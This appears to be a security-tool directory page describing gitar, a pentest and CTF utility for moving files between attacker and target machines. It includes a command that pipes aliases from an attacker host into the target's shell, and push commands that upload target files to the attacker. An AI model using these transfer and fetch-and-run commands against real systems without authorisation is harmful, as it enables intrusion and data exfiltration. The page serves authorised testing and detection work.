Name: gitar
Author: ariary

Primary Use Case

This tool is primarily used by penetration testers and red teamers to quickly upload and download files or directories between attacker and target machines without requiring installation on the target. It simplifies file exchange during engagements by providing easy-to-use shortcuts and additional features like webhook logging and secure deployment.

Key Features

Simple file upload and download with filename completion

No installation required on the target machine

Supports both file and directory transfer (push/pull and pushr/pullr)

Quick file sending via multiple protocols with remembered configurations

HTTP webhook mode for logging and forwarding requests

Secure server launch via Docker container with HTTPS

Minimal prerequisites on target (curl, tar)

Fast and simple deployment with shell aliases

Insights & Recommendations

Ensure HTTP connectivity between attacker and target machines. Target machine requires minimal tools (curl, tar) but no installation of gitar itself. For secure deployments, use the Docker container mode with HTTPS to reduce exposure risks. The tool emphasizes simplicity and speed, making it ideal for quick file exchanges during pentests or CTFs without complex setup.

Installation

On attacker machine, run `gitar` to launch the server
On target machine, source the shortcut aliases with `source <(curl -s http://[attacker_ip:port]/alias)`
Optionally, run gitar inside a Docker container for secure HTTPS deployment
Ensure target machine has `curl` and `tar` installed
On attacker machine, optionally install `xclip`, `tree`, and `dig` for enhanced functionality
Install gitar using `go install` (exact command truncated in README)

Usage

gitar

Launch the gitar HTTP server on the attacker machine

source <(curl -s http://[attacker_ip:port]/alias)

Load shell shortcuts on the target machine for file transfer commands

pull [file]

Download a single file from attacker to target with filename completion

pullr [directory]

Download a directory recursively from attacker to target

push [file]

Upload a single file from target to attacker

pushr [directory]

Upload a directory recursively from target to attacker

gitar send scp -t target.com -u root /img

Quickly send a file or directory to a target using SCP with interactive prompts

gitar send -l exploit.sh

Send a file using the last remembered configuration

gitar webhook -P payload

Start webhook mode to log incoming HTTP requests and extract specific parameters

docker run -it --rm --net host --cap-drop=all --cap-add=dac_override --user $(id -u):$(id -g) -v "${PWD}:/gitar/exchange" ariary/gitar

Run gitar server inside a Docker container for secure HTTPS file sharing

Smart Usage Notes

Integrate gitar with automated exploitation frameworks like Metasploit to streamline payload delivery and file retrieval.Use gitar's webhook logging feature to trigger alerts or automated responses in blue team monitoring systems.Deploy gitar in containerized environments with HTTPS to minimize exposure risk during engagements.Leverage gitar's minimal prerequisites to quickly establish file transfer channels in constrained or hardened environments.In purple team exercises, use gitar to simulate adversary file transfer techniques and improve detection capabilities.

OpenSec Atlas

gitar

About This Tool

Primary Use Case

Key Features

Insights & Recommendations

Installation

Usage

Smart Usage Notes

Security Capability Profile

Tags

You Might Also Like